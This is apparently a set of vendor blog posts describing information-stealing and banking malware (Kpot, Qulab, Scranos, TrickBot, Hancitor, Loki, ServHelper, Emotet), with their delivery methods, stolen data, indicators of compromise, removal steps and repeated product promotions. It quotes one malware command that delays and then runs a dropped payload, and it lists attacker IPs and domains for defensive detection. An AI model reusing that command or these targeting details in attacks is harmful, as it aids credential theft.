Kpot, an older information stealer just got a major update
and is seen in the wild again. This time Kpot brings zero persistence (meaning
its never written to your computer) and instead does all of its attacks in
memory before leaving your computer completely. Removing the ability to detect
it without Real-time protection.
How it works
Kpot is delivered mainly through malicious email
attachments, when opened they request permission to “Enable Editing” and appear
to be unreadable without clicking on it. This attack vector, however, provides
the attacker with full access to the computer. After the attack vector is used
Kpot gets to work extracting as much as it can. First, it sends a message to
its C&C server and asks what it should do. The reply can include many
possible commands that can be updated in time, at the time of this writing it includes
the following.
Browsers (Chrome, Mozilla, Internet Explorer): cookies,
passwords, Autofill data, and history are taken and sent back to the C&C
server.
Crypto: various cryptocurrency files. This can reveal
numerous information regarding credentials, emails, and wallets depending on
what the software used stores on the computer.
Discord: A chat interface advertised mainly to gamers: chat history, and user
information can be stolen from files on the computer.
Battlenet: A game portal for World of Warcraft, StarCraft,
and Diablo among others. Information regarding accounts can be stolen this way
leading to compromised accounts without further fail safes such as 2-factor
authentication.
Screenshots: Kpot can take pictures of what you are
currently doing. This could be done when it recognizes open bank windows or
other compromising information that may not be stored on your computer but are
visible on the screen.
Windows credentials: Kpot can steal your windows account
information such as username and password.
Grabber: A more advanced version than Qulab uses, Kpot uses
its grabber to find any files that may have information but are not connected
to an application. An example would be “passwords.txt” on the computer. Note
that it does not focus on the naming and instead goes for taking any files
ending in certain letters, such as txt, pdf, and doc to name a few.
Delete: Kpot uses this command to delete itself from the
computer and any other evidence it might have been there.
Who is affected?
One of the scary things about Kpot is that is very
affordable on the dark web. Coming in at only $100 with support optional it no
longer takes a master hacker to obtain an information stealer that they can
then use in a variety of ways. These could be slipped into downloads from
illegitimate sources or used in malspam campaigns.
Indicators of Compromise
What you can do
If you or someone you know is infected with Kpot
malware download SUPERAntiSpyware Professional right now and get a 14 day free
trial, no credit card required. SUPERAntiSpyware is easy to
install and will detect and remove Kpot from any Windows computer. If you are a
Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition
solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click
here: https://www.superantispyware.com/technician-download.html
Info stealers are nothing new, and Qulab is no
exception. Designed to get in quick and
get as much data as they can, these malicious programs steal all personal
information about you from your computer. In particular, Qulab is know in its
current iterations to steal information from browsers, including:
login credentials and history
file transfer protocol credentials
Discord and telegram logs
Steam information and accounts
It can copy any file that ends in .txt, .maFile, and
wallet.dat—in case you have anything important lying
around.
How it works
Qulab is built in a scripting language called AutoIT. Generally used to automate monotonous tasks done with a keyboard and mouse, AutoIT gives the hacker the same power as a programming language, while making it easier (in most cases) to program due to it being written in a simpler language. Once executed on your computer, Qulab sets up a few important settings, namely no tray icon, which prevents you from seeing it running. Then, Qulab starts to replace things like windows function calls and database queries with slightly modified code. By modifying these common functions to use custom versions, the malwares reduces its reliance on the computer it is infecting and allows it to cause more damage.
After running on the you computer, the malware quickly sets
up persistence on the computer through well-know methods—such
as running the program on computer startup—and a less
well-known method that reruns the malware on any major computer change, such
as:
changing any computer settings
network status changes
connecting to or disconnecting from charger on a
laptop
being idle for a set period of time
The “clipper” functionality of Qulab revolves around watching what is in your clipboard (the place that stores data you copy) and changing it if it matches certain parameters. One of the most notable is that it will replace wallet IDs for cryptomining account so that the earned money proceeds to go into the hacker’s account rather than yours. If you do not have cryptomining on your computer then it won’t do anything but slow down your computer.
The “browser stealer” function checks to see which browsers
you have installed and then immediately attempts to steal files with any
important information. The most notable are wallet.dat, login data that is
stored on the browser, and history.
Discord , a online chat service, saves messages and chat history on its local computer when installed. Qulab looks for these files and if it finds them it decrypts them and sends them off to the hacker.
Qulab also attempts to hijack steam sessions, and if the computer uses the Steam Desktop Authenticator, Qulab also attempts to steal a file that provides authentication details. This is becoming common for most information stealers.
After all this data as been extracted, Qulab sends it to the
hacker and then continues to scan every couple of seconds to see if any new
information has arrived.
Who is affected?
One of the scary things about Qulab is that it is very
affordable on the dark web. Coming in at only $30 with support optional, it no
longer takes a master hacker to obtain a powerful, flexible information stealer.
It could be slipped into downloads from illegitimate sources or used in malspam campaigns.
Indicators of Compromise
%APPDATA%/%RANDOM_FOLDER%/
%APPDATA%/%RANDOM_FOLDER%/1/
%PAYLOAD_NAME%.module.exe (7zip)
%PAYLOAD_NAME%.sqlite.module.exe (sqlite3.dll)
IP 185.142.97.228
What you can do
If you or someone you know is infected with Qulab malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Qulab from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html
Scranos
is a new player to the global malware scene that leverages many well-known and
some new methods to obtain login credentials and bank information. It can also
steal or manipulate information from several online accounts to access your Amazon,
Airbnb, Facebook, Steam, and YouTube accounts.
How it works
Scranos is installed through various methods, including:
cracked software
pirated videos and movies
legal alternative software such as e-book
readers, video players, driver updaters, and fake antimalware products
When installed, Scranos installs a rootkit driver that ensures it remains on the computer unless removed by a legitimate
antivirus program.
Once Scranos has gained persistence, it injects another
running process with a downloader so that it can download other functionally. When it’s done, Scranos removes All
downloaded contentfrom the computer to make it easier to keep itself hidden.
Among the functionality that Scranos downloads is a YouTube
module. This module launches Chrome (and
installs it if it’s not already installed), goes to YouTube, mutes it, and
subscribes to channels that the attackers use to earn money. Other methods
Scranos uses to gain information include:
stealing information from various online
platforms
modules that inject various false advertisement
bitcoin miners
In addition, Scranos has capabilities to infect other operating
system such as Linux, IOS, and Android. These targets can be installed through phishing attempts from infected users’ Facebook messages.
Who is affected?
Scranos, due to its infection methods, can affect anyone,
even those who do not download illegal software. While Scranos has been active
in a testing form in several regions, it has been noticed on a global scale in
recent months, indicating that testing may be done, or that they are testing on
a larger scale. Either way, Scranos seems to just be getting
started, and everyone is at risk.
Indicators of compromise
YouTube or Facebook accounts showing activity during times it was not used
%WINDIR%\System32\<random looking names>
wcrx.exe
Chrome extensions that the user didn’t install
Y2B.EXE
HKCU\Software\@demo
HKLM\Software\Microsoft\@msver1
HKLM\Software\Microsoft\@msver2
HKLM\Software\Microsoft\@o2
HKLM\Software\Microsoft\@o3
What you can do
If you or
someone you know is infected with Scranos malware, download SUPERAntiSpyware
Professional right now and get a 14-day free
trial, no credit card required. SUPERAntiSpyware is easy to
install and will detect and remove Scranos from any Windows computer. If you
are a Computer Technician, you may like to try our SUPERAntiSpyware Tech
Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html
TrickBot is once again making itself known during tax season and attempting to steal your hard-earned money. TrickBot was originally discovered in October of 2016 but has since changed and evolved dramatically into one of the most prolific attacks today.
How it works
Just like Emotet, TrickBot primary spreads by specially designed
emails or malspam that attempts to trick the user into clicking or downloading the attachment.
The current campaign, as of this writing, is TrickBot’s normal tax season
attack: pretending to be the IRS. In the
example below, the link will send you a to a domain that looks official but is
slightly misspelled.
Once TrickBot is installed on a computer, it sets up a scheduled
task to make sure it has a persistent presence on the computer before starting
to steal information. In addition, it disables Windows Defender early on so
that it won’t be removed. SUPERAntiSpyware is not stopped in this way.
TrickBot does not show any signs of running on a user’s
computer and the only “noise” it makes is the network traffic it creates.
Recording network traffic is generally only done by businesses, which helps
TrickBot evade detection on personal computers.
TrickBot uses a module design, much like Emotet and other bankers. Not only does this allow TrickBot to quickly
change its attack capabilities, but it also makes it harder to detect. These
modules often do one thing well rather than trying to do many things. Some are
designed to go after hosted ftp servers, cached remote desktop credentials, and
bitcoin mining accounts.
The most common module, however, allows TrickBot to redirect the user to fake bank sites that, instead of logging the user in, will steal account credentials. The scammers make this possible by domain squatting, or registering an internet address that is only slightly different than the one you intend to visit. For instance, if you receive an email about your GoDaddy account, you might not notice if a link in that email goes to godabdy.com/payyourbill (godaddy is misspelled with a b instead of the second d).
This is compounded upon by hiding the URL so only the
studious will look for it and by making the site look like you expect through
careful recreation by the attackers. Many big companies will attempt to combat
this by buying these fake sites and then redirecting them to the appropriate
domain, but this is not always easily done.
Who is affected?
TrickBot is aimed more at business than casual users;
however, it is still the number-one banker, and anyone who lives inside the
USA, Africa, Europe, and Middle East should be wary. (This does not exclude
other areas from being hit, just shows that they are not the current target.)
Indicators of Compromise
C:\Documents and Settings\<USER>\Application
Data\Microsoft\Crypto\RSA\S-1-5-21-1275210071-920026266-1060284298-1003\8c8436195f6e0875edb85e34665c32ec_fabbc6a1-c573-4ea0-9ca1-50004b35a440
Scheduled Task that points to a file in AppData
such as C:\Users\<User>\AppData\Roaming\
What you can do
If you or someone you know is infected with TrickBot
malware, download SUPERAntiSpyware Professional right now and get a 14
day free trial, no credit card required.
SUPERAntiSpyware is easy to install and will detect and remove TrickBot from
any Windows computer. If you are a Computer Technician, you may like to try our
SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use
Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html
Hancitor, also known as Chanitor, is known for dropping its payloads rather than downloading them post-infection, as well as for a unique phishing approach to trick users into downloading and activating Microsoft Word documents with malicious macros.
How it works
Hancitor uses a new template that attempts to fool the user
into believing that it is a FedEx tracking number. There is no attachment,
however; instead, the tracking number link directs the user to the sjkfishfinders[.]com domain and then downloads the Word
document. Once downloaded, the Word file attempts to trick the user into
allowing macros, which would trigger code residing inside the file. An example
can be seen below:
The lack
of an attachment, often seen as a red flag by many users, may lure the user
into a false sense of security. It is important to be careful about which links
you click: on most modern web browsers, hovering your mouse pointer over the
link will tell you where the link will lead to. If you do not know the address,
then it is safer to avoid following the link.
When a user enables the macro, rather
than download the application from the internet, the application it is instead extracted
from inside the document and dropped in the hidden folder \AppData\Local.
Before finishing, the script launches the command cmd.exe /c ping localhost -n 100
&& C:\Users\admin\AppData\Local\Temp\6.pif. Ping is used to delay
the attack to avoid automatic detection by waiting for approximately 100
seconds before running the dropped application 6.pif. 6.pif then
reaches out to a C&C server before downloading
new malware or running commands.
In addition to 6.pif, another file is dropped at C:\Users\admin\AppData\Local\Temp\6fsdFfa.com.
This executable is a banker. Immediately after being run, it reaches out to api.ipify.org, which returns the
victim’s public IP address. It then attempts to submit several unique values
and the IP address in plain text to a list of infected servers. If the infected
servers reply back indicating that they are available to receive the data, the
program will begin compiling all the
usernames and passwords it can obtain and submit them to the server.
Other templates have been used by Hancitor in the past, including but not
limited to: divorce papers, parking tickets, and FTC claims. As always, its
important to have Microsoft
Office macros disabled unless required by your job.
Who is affected?
Anyone with an email address can become a target of this mal-spam campaign. While it does not use victims’ email addresses like Emotet does, Hancitor’s unique templates are meant to catch even savvy users off guard, regardless of whether the email is used for work or is a personal email.
If you or someone you know is infected with Hancitor
malware download SUPERAntiSpyware Professional right now and get a 14-day free trial, no
credit card required. SUPERAntiSpyware is easy to install and will detect
and remove Hancitor from any Windows computer.
Restart the infected computer in safe mode
without networking.
Search through the items in the Indicators of
infection section above and investigate any files/folders you do not recognize.
You can run the file through SUPERAntiSpyware or online through VirusTotal.com
to confirm that it is malware.
Delete files and folders that have been
confirmed as malware.
Repeat steps 1-3 on all other machines in the
network.
Restore all infected computers to normal mode
only after confirming the infection is removed.
Attack Vector: Is the way the attacker gains access to a target. The most common of these are malicious emails but many more exist and are discovered all the time.
BackDoor: Is a bypass allowing a Malicious user to connect to the target machine without permission from the target. These can be in the form of default username and passwords baked into the machine or a malicious download that opened a connection for the malicious user.
BlackHat: Is a term referring to a hacker who hacks for personal gain. The term refers to the old western movies where the good guy would wear a white hat and the bad guys would wear a Blackhat.
Banker: Refers to a malicious file that attempts to steal bank information from the user.
Command and Control: refers to code under a attackers control that listens for messages and replies with commands for the malware to execute. For example, a piece of malware infects a windows computer and detects that the user uses chrome but not firefox. It messages its C&C asking what it should do and the C&C decides that it should only run the Chrome information stealer command rather than execute all of its commands. After the malware sends the information it gathered back to the C&C server.
Domain squatting/cybersquatting: refers to holding or squatting on a misspelled or visually similar web address to trick victims into visiting and trusting the site.
Downloader: Refers to a software that Maliciously downloads another file from the internet and then executes it.
Dropper: Refers to a software that has a malicious file residing inside of it which is extracted and then ran.
Keylogger: A piece of software designed to record every key pressed on your keyboard, mostly used to steal your usernames and passwords.
Mal-Spam: (malicious-Spam) is a technique used by attackers where they send out emails pretending to be something you would expect to receive. This is a very common attack.
Phishing: fraudulent attempt to obtain sensitive information such as usernames, passwords and credit card details by disguising as a trustworthy entity. Normally done over email or instant messaging.
Ransomware: A type of malware which encrypts your files, effectively holding your documents hostage until you pay to get them unlocked.
RootKit: A type of malware that abuses Operating systems trust of certain key often low level aspects so as to gain persistence and become harder to remove.
Supply Chain Attack: A attack Vector involving malicious attackers gaining access to trusted software and injecting there own code inside of it. Allowing them to bypass many security checks.
Delivered through malicious spam campaigns, Loki focuses on stealing credentials off the victim computer and runs a keylogger. Loki also communicates back to a Command and Control server (C&C) to report what it finds and to receive commands if needed.
How it works
Loki, named after the creator’s username Lokistov, is delivered to users
through a variety of channels, but the most common is malicious emails that can
come in a variety of types. The most common strategy is the familiar
“invoice” style email that attempts to get the potential victim to
open the attachment. Once opened, the “invoice” will try to run embedded
macros or get the user to follow a link to a downloader. One example of such a
“invoice” can be found below.
If the potential victim were to click “Enable Content,” Loki would be installed and start gathering data. This is a common attack vector[ and was used by, albeit in a more complex way, Emotet.
This is not the only way Loki can be delivered, however, as it can be purchased by a malicious user, Loki will be delivered in the most cost effective way.
Loki focuses primarily on credential-stealing and boasts an impressive 80 programs it has the ability to steal from. The most notable being all major browsers, including:
Google Chrome
Mozilla Firefox
Microsoft Edge
Microsoft Internet Explorer
Opera Software’s Opera browser
In addition to this already worrying list, Loki is able to go after many alternative
versions of these browsers such as:
8pecxstudio’s variant of Firefox, Cyberfox
Google’s open-source browser Chromium
Independently developed Firefox fork, WaterFox
Nichrome
In addition to browsers, Loki can go after FTP clients, Microsoft Outlook,
and independently developed SuperPuTTY. This list will likely be expanded in
future campaigns to include more commonly used programs if vulnerabilities are
found.
After connecting and confirming the presence of its C&C server, Loki launches a keylogger in a separate thread. This keylogger records every button press of the keyboard during its operation and can be used to reveal other passwords and usernames that may not have been stored in a program it can access. This is then bundled with any other data it retrieved.
Once the data is gathered, it is compressed and sent to the C&C server hosted by the malicious actor. These normally are shut down quickly after a new campaign has been identified but can remain active for days or weeks at a time giving them plenty of time to store the gathered data somewhere else and sell it.
Who is affected?
Loki can be bought in the dark web for fairly cheap. Last know price at the time of this writing was $70. The consequence of this is that Loki can be used to target anyone. The benefit of the availability is it makes it much easier for Anti-Malware companies to stop it.
Indicators of Compromise
C:\Users\admin\AppData\Local\Temp\saver.scr
a.doko.moe
MD5: 500F84B83BE685009C136A67690CA0C3
What you can do
If you or someone you know is infected with the Loki malware download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Loki from any Windows computer.
Restart the infected computer in safe mode without networking.
Search through the items in the Indicators of Infection section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
Delete files and folders that have been confirmed as malware.
Repeat steps 1-3 on all other machines in the network.
Restore all infected computers to normal mode only after confirming the infection is removed.
ServHelper is a new backdoor with a downloader variant, which first appeared in November of 2018. Named by the Threat actor “Ta505,” ServHelper spreads through email campaigns using a quantity-over-quality approach that has proven to work, albeit less effectively than the Emotet strategies discussed here. ServHelper seems to be largely targeted toward businesses but could change to focus on individual’s in future campaigns.
How does ServHelper works
ServHelper is downloaded through Microsoft Word documents with macros. The documents often pretend to be invoices, though they may take other forms such as, but not limited to: greeting cards, complaints, or details from your bank. These documents attempt to convince the victim to enable macros in them by saying that the content cannot be viewed until macros are enabled. If the victim clicks the Enable Content button, the infected document runs code that downloads ServHelper to the computer. You can learn more about how to protect yourself here. An example is shown below:
Another method employed by ServHelper is to distribute PDF files that claim you must follow the link provided to update your PDF viewer. These links instead reach out to a download server that infects anyone who visits. The end result is the same regardless of whether the victim gets the infection from a Word document or a PDF.
Once installed, ServHelper does one of two things.
Establishes a remote-control session that allows the malicious actor to control the infected computer from anywhere. To accomplish this, the malware talks to a Command and Control server (C&C) where it takes it commands from. Some of the notable commands include: the ability to kill itself and remove traces of itself from the computer, the ability to copy user’s browser profiles, and the ability to execute a command shell. This allows the attackers to gain access to your PII as well as any passwords, usernames, bank account information, and more.
Drops another piece of malware known as FlawedGrace. ServHelper recently removed some of its capabilities (in this version only) to instead focusing on dropping this malware. FlawedGrace acts as a remote-access Trojan providing similar functions to ServHelper.
Who is affected?
ServHelper largely targets businesses, so most of the emails are designed to look like emails you would see in your day-to-day business, such as invoices. Despite this active focus, it’s entirely possible for computers outside of a business to be infected and extorted, so protection is paramount.
Indicators of Compromise
ServHelper makes several changes that indicate whether a computer has been infected.
The most noticeable one is the C:\Windows\ServHelper.dll that is dropped in the windows folder.
Unusual scheduled startup tasks are always noteworthy and ServHelper uses them to start itself every time a victim’s computer is ran.
If you or someone you know is
infected with the ServHelper malware, download SUPERAntiSpyware Professional
right now and get a 14-day free trial, no credit card
required. SUPERAntiSpyware is easy to install and will detect and remove
ServHelper from any Windows computer.
Restart the infected computer in safe mode without networking.
Search through the Indicators of infection listed above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
Delete files and folders that have been confirmed as malware.
Repeat steps 1-3 on all other machines in the network.
Restore all infected computers to normal mode only after confirming the infection is removed.
You may have heard of the Trojan Emotet before. Since first appearing back in 2014 stealing banking information, it has
evolved into a multi-faceted threat that targets everyone. It uses social engineering through emails to
attempt to convince the user to open a Microsoft Word document and run its
malicious macros. Even more worrisome is that once Emotet has infected a
target, it attempts to take over the victim’s Microsoft Outlook desktop
application. If successful, Emotet goes through all sent emails and contacts
and send out a new wave of spam emails. Only this time, the potential victims
are receiving the message from a trusted email.
A campaign from Emotet over the
Christmas season read like a friend sending a friendly season greeting.
Dear <name>,
You make the stars shine brighter
and the winter days warmer just by being in my life. Merry Christmas to my
favorite person in the world.
Merry Christmas and a wonderful New
Year!
Greeting Card is attached
A lovely thing about Christmas is
that it’s compulsory, like a thunderstorm, and we all go through it together.
Garrison Keillor
While not limited to invoices or Christmas cards, these emails attempt to get the user to click the download link and then to open the document. In the email mentioned above the target may be fooled into thinking that the attached greeting card is legitimate. The document actually contains a malicious macro, an embedded script. While macros were initially designed to help automate keystrokes and mouse movements, they were quickly abused by nefarious virus creators. The infection cannot run on its own as Microsoft has automatically disabled macros more than a decade ago to help stop these malicious scripts. Instead, Emotet uses a few techniques to get the user to re-enable macros. Examples can be seen below.
The picture urges the user to click the Enable Content button, implying that they cannot view the Word document until they do so. You may have already noticed that the bar itself says that macros have been disabled, and the Enable Content button will, in fact, allow them. The moment that Enable Content button is clicked, the macros will start, and in seconds you will be infected. Even worse, in most cases you will have no indication from this point forward that anything is wrong. In one test case we briefly had a command window appear:
This window lasted less than two seconds before disappearing. This attack vector is not unique to Emotet though. In fact, it has been used by a number of ransomware attacks in the past. If you ever see a document you didn’t expect to receive, you should always be extremely cautious with it and you should never enable macros without a very good reason.
How it works
Emotet is an evolving malware that has been known to primarily spread itself through email spam campaigns. Emotet itself does not attempt to do much harm; instead, it opens the door for other malware who pay the doorman on the way in. It achieves this by using what is known as a Command and Control server (C&C): Emotet requests instructions from its C&C server, which issues a new command. This command could be anything from “grab this malware sample and run it” to “tell me what passwords are stored in the user’s browser.” Emotet can receive updates and new capabilities in this way as well, showing that if Emotet has infected your computer or network, it should be removed as quickly as possible.
Emotet doesn’t stop at the first computer infected though. Once it’s on a network, it will attempt to get to all computers it’s connected to through a brute-force attack. Unless strong passwords are enforced on machines and all known vulnerabilities are patched, a single installation of Emotet can cause every computer in the network to become infected. Emotet is often updated with new exploits as they are found, meaning that while it may not be successful at first, it will keep trying until it finds something that does work.
Code
We won’t go into too much depth on the actual code itself, but a brief step-by-step walkthrough can be useful to get a better understanding on how this malware works.
1. In the Word document there is a VBA script that is obfuscated so that you cannot read it at a glance. All this code does is launch a command shell, which then launches PowerShell, a more powerful version of the Windows command shell.
2. Using PowerShell, the script attempts to download the core Emotet payload from a large variety of distribution websites.
3. The randomly named payload will then reach out to the main server and request a command. The command will change based on the campaign that is running —it could go grab new malware or it could attempt to use your own email address as a way to spread itself.
Who is affected
Many people assume that they will not be targets of malware campaigns. Emotet, though, targets everyone equally: it has the simple goal of getting on every machine it can and then getting paid to let other, more targeted malware come in behind it. If your email address has ever been sold, disclosed in a breach, or was on a friend’s email list when they got infected, then it’s possible you will receive a malicious email from them.
Indicators of infection
The main location for the executable is in C:\Users\<name>\AppData\Local\ and then whatever new name Emotet decides to use. One we have seen often is archivessymbol, but this will change. If you see something in this folder you don’t know about, it’s important to run a scan.
Versions of Emotet can also drop files onto your computer in C:\Users\Public or C:\Users\<username>:
These files generally have 5-6 randomly generated numbers in the file name, followed by .exe. These are not actually executable files, but HTML documents that are used to generate revenue for the Blackhat’s by simulating clicks on web advertisements.
What you can do
If you or someone you know is infected with the Emotet malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Emotet from any Windows computer.
Emotet has also been known to
exploit a vulnerability in Windows called EternalBlue.
Microsoft has issued a patch for this, and applying this
patch can help protect you from Emotet as well as other malware who utilize
this exploit.
HOW TO REMOVE EMOTET
Restart the infected computer in safe mode without networking
Search through the Indicators of infection and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
Delete files and folders that have been confirmed as malware.
Repeat steps 1-3 on all other machines in the network.
Restore all infected computers to normal mode only after confirming the infection is removed.